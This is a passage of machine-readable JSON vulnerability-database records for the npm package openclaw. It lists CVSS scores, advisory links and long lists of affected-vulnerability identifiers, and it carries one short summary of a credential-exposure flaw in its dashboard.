scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v8wv-jg3q-qwpq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33581","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33581"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-mediaurl-and-fileurl-parameters","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-mediaurl-and-fileurl-parameters"},{"reference_url":"https://github.com/advisories/GHSA-3gr8-2752-h46q","reference_id":"GHSA-3gr8-2752-h46q","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3gr8-2752-h46q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["GHSA-3gr8-2752-h46q"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-26sv-grsd-abcw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50777?format=json","vulnerability_id":"VCID-2927-2whr-sudd","summary":"OpenClaw's dashboard leaked gateway auth material via browser URL/query and localStorage\nOpenClaw's macOS Dashboard flow exposed Gateway authentication material to browser-controlled surfaces.\n\nBefore the fix, the macOS app appended the shared Gateway `token` and `password` to the Dashboard URL query string when opening the Control UI in the browser. The Control UI then imported the token and persisted it into browser `localStorage` under `openclaw.control.settings.v1`.\n\nThis expanded exposure of reusable Gateway admin credentials into browser address-bar/query surfaces and persistent script-readable storage.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/10d0e3f3ca92326df0ca071fabffe463742f263c","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/10d0e3f3ca92326df0ca071fabffe463742f263c"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://github.com/advisories/GHSA-rchv-x836-w7xp","reference_id":"GHSA-rchv-x836-w7xp","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rchv-x836-w7xp"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rchv-x836-w7xp","reference_id":"GHSA-rchv-x836-w7xp","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rchv-x836-w7xp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8